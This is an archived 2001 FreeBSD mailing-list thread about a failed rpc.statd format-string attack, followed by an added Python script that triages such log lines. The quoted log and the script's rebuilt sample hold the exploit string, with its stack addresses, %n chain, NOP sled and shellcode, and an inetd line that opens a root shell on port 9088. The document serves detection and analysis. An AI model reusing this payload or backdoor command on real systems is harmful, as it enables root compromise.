From owner-freebsd-questions@FreeBSD.ORG Thu Jan  4 08:21:58 2001
Subject: Re: hack attempt (again) - help
From: Eric_Stanfield@kenokozie.com
To: Guy Helmer
Cc: freebsd-questions@FreeBSD.ORG
Date: Thu, 4 Jan 2001 10:16:31 -0600
X-Mailer: Lotus Notes Release 5.0.2a November 23, 1999
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1

Snort compiled, configured and running in less than 10 minutes. The ruleset looks very good for my purposes. Thanks for the tip; this is a good find.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Eric Stanfield, K2Access
Keno Kozie and Associates
222 N LaSalle #1500
Chicago, IL 60606
(312) 332-3000

Guy Helmer wrote on 01/04/01 09:26 AM (cc: freebsd-questions@FreeBSD.ORG, subject: Re: hack attempt (again) - help):

On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:
> Alright, this jerkoff has once again attempted to hack one of my FreeBSD
> machines by trying what I assume is a buffer overflow to rpc:
>
> Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PëK^M-
> v¬M-^Cî M-^M^(M-^CÆ M- ^°M-^Cî M-^M^.M-^CÆ M-^CÃ M-^Cë#M- ^´1ÀM-^Cî
> M-^HF'M-^HF*M-^CÆ M-^HF«M- F¸°+, M- óM-^MN¬M-^MV¸ÍM-^@1ÛM-
> Ø@ÍM-^@è°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >>
> /tmp/m; /usr/sbin/inetd /tmp/m;
>
> The interesting bit is what he (she?) is attempting to sneak in at the end
> of the garbage sent to the port.
>
> I've given the system a thorough check and this seems to have been a second
> failed attempt. I'm now annoyed, however, and would like to be able to at
> least log what address this stuff is originating from. Can anyone suggest
> something from the ports that would do the trick? I've disabled nfs/rpc,
> but I'm sure the hacker will come knocking again.
Snort with a current copy of the rule set from http://www.whitehats.com/ids/index.html ought to detect this (and lots of other script kiddie attempts).

Guy
--
Guy Helmer, Ph.D.  Sr. Software Engineer, Palisade Systems
ghelmer@palisadesys.com  http://www.palisadesys.com/~ghelmer
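The log line Eric posted records the payload but not who sent it: rpc.statd logs only the bogus hostname, so the source address has to come from the network side, which is what the Snort suggestion gives him. What the line itself does reveal can still be pulled out automatically. The following is an added example, not code from either poster or from Snort: a Python triage script that reverses syslogd's ^X / M-^X escapes (the Latin-1 characters in the post are high bytes printed verbatim), recovers the little-endian stack addresses that the %n directives later write through, replays printf's output counter to show the value each %n writes, measures the NOP sled, and pulls out the inetd backdoor line. The sample log line, the i386 stack-address range used as a heuristic, and the assumption that each conversion prints exactly its minimum width are constructed assumptions for this example.

```python
"""Triage an rpc.statd "Invalid hostname to sm_mon" log line.

Added example for this thread, not code from the posters or from Snort.
syslogd renders non-printable bytes vis-style: ^X for 0x00-0x1f and 0x7f,
M-^X for 0x80-0x9f, M-x for other high bytes; printable high bytes appear
as Latin-1 characters. Undoing that exposes the exploit structure.
"""
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the quoted log line: same address pairs,
# %n chain, sled and dropped command; the shellcode body is cut to its jmp.
SAMPLE_LINE = (
    "Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: "
    + "".join(f"^{chr(0x40 + b)}\xf7\xff\xbf" * 2 for b in (4, 5, 6, 7))
    + "%08x " * 14
    + "%0242x%n%055x%n%012x%n%0192x%n"
    + "M-^P" * 48 + "\xebK"  # NOP sled, then the first two shellcode bytes
    + '/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; '
    + "/usr/sbin/inetd /tmp/m;"
)

STACK_LO, STACK_HI = 0xBF000000, 0xBFFFFFFF  # assumed i386 Linux user stack
DIRECTIVE = re.compile(rb"%([-+ #0]*)(\d*)(?:\.\d+)?(?:hh|h|ll|l)?([diouxXcspn%])")
BACKDOOR = re.compile(rb'echo "(\d+) stream tcp nowait (\w+) ([^"]+)" >> ([^\s;]+)')


def _is_ctrl_escape(ch: str) -> bool:
    # ^? and ^@..^_ are the only caret escapes; a bare ^ (0x5e) in shellcode
    # followed by anything else is a literal byte, not an escape.
    return 0x3F <= ord(ch) <= 0x5F


def unvis(text: str) -> bytes:
    """Undo syslogd's ^X / M-^X / M-x escapes; other characters are Latin-1."""
    out, i = bytearray(), 0
    while i < len(text):
        if text.startswith("M-^", i) and i + 3 < len(text) and _is_ctrl_escape(text[i + 3]):
            out.append(0x80 | (ord(text[i + 3]) ^ 0x40)); i += 4
        elif text.startswith("M-", i) and i + 2 < len(text):
            out.append(0x80 | (ord(text[i + 2]) & 0x7F)); i += 3
        elif text[i] == "^" and i + 1 < len(text) and _is_ctrl_escape(text[i + 1]):
            out.append(ord(text[i + 1]) ^ 0x40); i += 2
        else:
            out.append(ord(text[i]) & 0xFF); i += 1
    return bytes(out)


def leading_addresses(payload: bytes) -> List[int]:
    """Little-endian words at the front that look like stack addresses:
    the pointers that the later %0NNNx/%n pairs consume and write through."""
    addrs = []
    for off in range(0, len(payload) - 3, 4):
        word = int.from_bytes(payload[off:off + 4], "little")
        if not STACK_LO <= word <= STACK_HI:
            break
        addrs.append(word)
    return addrs


def simulate_n_writes(payload: bytes) -> List[int]:
    """Replay printf's output counter and record it at each %n, which is
    the int written through the pointer %n consumes. Each address is
    duplicated because %0NNNx eats one copy and %n lands on the other;
    targets one byte apart assemble a value from each count's low byte.
    Assumes every conversion prints exactly its minimum width (exact for
    widths >= 8 with a 32-bit %x) and ignores whatever the vulnerable
    syslog call printed before the hostname, so values are illustrative."""
    count, pos, writes = 0, 0, []
    for m in DIRECTIVE.finditer(payload):
        count += m.start() - pos  # literal bytes preceding the directive
        pos = m.end()
        conv = m.group(3)
        if conv == b"n":
            writes.append(count)
        elif conv == b"%":
            count += 1
        else:
            count += int(m.group(2) or 8)
    return writes


def triage(line: str) -> Optional[Dict]:
    """Report on an rpc.statd sm_mon line; None for any other log line."""
    marker = "Invalid hostname to sm_mon: "
    if "rpc.statd" not in line or marker not in line:
        return None
    payload = unvis(line.split(marker, 1)[1])
    addrs = leading_addresses(payload)
    sled = max((len(run) for run in re.findall(rb"\x90+", payload)), default=0)
    hit = BACKDOOR.search(payload)
    return {
        "verdict": "format-string exploit" if b"%n" in payload and addrs else "malformed hostname",
        "targets": sorted(set(addrs)),
        "n_writes": simulate_n_writes(payload),
        "nop_sled": sled,
        "backdoor": None if hit is None else {
            "port": int(hit.group(1)), "user": hit.group(2).decode(),
            "cmd": hit.group(3).decode(), "conf": hit.group(4).decode(),
        },
    }


if __name__ == "__main__":
    print(triage(SAMPLE_LINE))
```

Running it on the sample reports four write targets one byte apart at 0xbffff704..0xbffff707, the four %n counts, a 48-byte sled and the inetd line that would open a root shell on port 9088. The caret decoding is deliberately restricted to the control-character escapes: the real shellcode in the post contains literal 0x5e bytes rendered as a bare "^", which is why only the leading fields of such a line can be decoded with confidence.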